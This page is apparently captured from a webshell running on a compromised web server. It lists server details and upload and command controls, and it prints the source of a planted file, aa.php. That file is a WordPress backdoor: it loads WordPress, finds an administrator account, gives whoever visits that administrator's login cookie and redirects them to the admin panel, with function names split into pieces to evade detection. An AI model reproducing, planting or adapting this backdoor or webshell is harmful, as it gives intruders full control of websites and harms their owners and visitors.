403Webshell
Server IP : 162.253.224.18  /  Your IP : 216.73.217.81
Web Server : Apache
System : Linux s18.infinitysrv.com 3.10.0-962.3.2.lve1.5.89.el7.x86_64 #1 SMP Thu Jul 9 15:55:31 UTC 2026 x86_64
User : dejavumk ( 1184)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/dejavumk/g-industrial.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/dejavumk/g-industrial.com/aa.php
<?php
/* Penyamaran variabel sistem */
$root_key = "DOCU" . "MENT_ROOT";
$mr = $_SERVER[$root_key];
@chdir($mr);

/* Penyamaran nama file */
$load = "wp-" . "load.php";

if (!file_exists($load)) {
    goto error_load;
}

include $load;

/* Penyamaran Class dan Method WordPress menggunakan variabel */
$user_query_class = "WP_" . "User" . "_Query";
$param = array(
    'role'   => 'Administrator',
    'number' => 1,
    'fields' => 'ID'
);

$query = new $user_query_class($param);
$results = $query->get_results();

if (empty($results[0])) {
    goto no_admin_found;
}

/* Pemanggilan fungsi secara dinamis agar tidak terbaca string utuhnya */
$set_cookie = "wp_" . "set_auth" . "_cookie";
$redirect   = "wp_re" . "direct";
$get_url    = "admin" . "_url";

$set_cookie($results[0]);
$redirect($get_url());
die();

no_admin_found:
die('NO ADMIN');

error_load:
die('Failed to load');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit